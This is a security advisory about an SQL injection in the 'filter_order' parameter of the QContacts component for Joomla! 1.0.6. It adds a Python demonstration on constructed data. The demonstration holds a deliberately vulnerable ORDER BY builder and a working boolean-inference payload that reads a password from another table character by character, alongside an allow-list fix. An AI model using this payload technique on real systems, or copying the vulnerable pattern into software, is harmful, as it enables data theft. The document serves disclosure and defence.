Joomla! QContacts Component "filter_order" SQL Injection Vulnerability

SECUNIA ADVISORY ID:
SA47238

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47238/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47238

RELEASE DATE:
2011-12-14

DESCRIPTION:
A vulnerability has been discovered in the QContacts component for
Joomla!, which can be exploited by malicious people to conduct SQL
injection attacks.

Input passed via the "filter_order" parameter to index.php (when
"option" is set to "com_qcontacts" and "filter_order_Dir" is set) is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is confirmed in version 1.0.6. Other versions may
also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised. Where
"filter_order" and "filter_order_Dir" select a sort column and sort
direction, note that neither can be passed as a bound query parameter;
validate "filter_order" against a fixed list of permitted column names
and "filter_order_Dir" against the values ASC and DESC, rejecting
anything else rather than attempting to escape it.
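The following is an added illustration written for this advisory; it is
not code from QContacts or Joomla!. It assumes that "filter_order" and
"filter_order_Dir" are concatenated into an ORDER BY clause, as their
names suggest, and uses Python with an in-memory SQLite database (with a
constructed "contacts" table and a constructed "users" table holding a
made-up secret) in place of the component's PHP and MySQL. The
vulnerable builder shows how a sort column under attacker control lets a
CASE expression turn the row order into a boolean oracle that reads data
from another table one character at a time; the hardened builder shows
the allow-list check described under SOLUTION.

```python
import sqlite3

# Constructed sample data; not real QContacts or Joomla! data.
SAMPLE_CONTACTS = [
    (1, "Zed", "zed@example.org"),
    (2, "Amy", "amy@example.org"),
    (3, "Mia", "mia@example.org"),
]
SECRET = "s3cret"  # constructed value the injection will read out


def make_db():
    """Build the throwaway in-memory database used by the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?, ?)", SAMPLE_CONTACTS)
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, ?)", (SECRET,))
    return conn


def list_contacts_vulnerable(conn, filter_order, filter_order_dir):
    """Vulnerable pattern: request parameters concatenated into ORDER BY."""
    sql = ("SELECT id, name FROM contacts ORDER BY "
           + filter_order + " " + filter_order_dir)
    return [row[1] for row in conn.execute(sql)]


def leak_secret_char(conn, position, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Boolean-based inference through the sort order.

    When the guess is right the CASE yields the name column and the rows
    come back sorted by name; when it is wrong the CASE yields the id
    column and the rows keep their insertion order.
    """
    for guess in alphabet:
        payload = ("(CASE WHEN (SELECT substr(password,%d,1) FROM users WHERE id=1)='%s'"
                   " THEN name ELSE id END)" % (position, guess))
        names = list_contacts_vulnerable(conn, payload, "ASC")
        if names == ["Amy", "Mia", "Zed"]:
            return guess
    return None


def leak_secret(conn, length):
    """Recover `length` characters of the secret via the ORDER BY oracle."""
    return "".join(leak_secret_char(conn, pos) or "?" for pos in range(1, length + 1))


# Hardened pattern: identifiers cannot be bound, so allow-list them.
ALLOWED_ORDER_COLUMNS = ("id", "name", "email")
ALLOWED_DIRECTIONS = ("ASC", "DESC")


def list_contacts_hardened(conn, filter_order, filter_order_dir):
    """Only a known column name and a known direction reach the query text."""
    if filter_order not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("rejected filter_order: %r" % filter_order)
    direction = filter_order_dir.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("rejected filter_order_Dir: %r" % filter_order_dir)
    sql = "SELECT id, name FROM contacts ORDER BY %s %s" % (filter_order, direction)
    return [row[1] for row in conn.execute(sql)]


def hardened_rejects(conn, filter_order, filter_order_dir):
    """True if the hardened builder refuses the given parameters."""
    try:
        list_contacts_hardened(conn, filter_order, filter_order_dir)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, legitimate input:", list_contacts_vulnerable(db, "name", "ASC"))
    print("vulnerable, leaked secret:   ", leak_secret(db, len(SECRET)))
    print("hardened, legitimate input:  ", list_contacts_hardened(db, "name", "DESC"))
    print("hardened rejects payload:    ",
          hardened_rejects(db, "(CASE WHEN 1=1 THEN name ELSE id END)", "ASC"))
```

The injection here only changes which rows sort first, so it is invisible
as an error and shows why escaping quotes is not a fix: the payload needs
no quote to break out of, because the column name is already in query
text. The allow-list is the only check that closes this class of bug.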

PROVIDED AND/OR DISCOVERED BY:
Don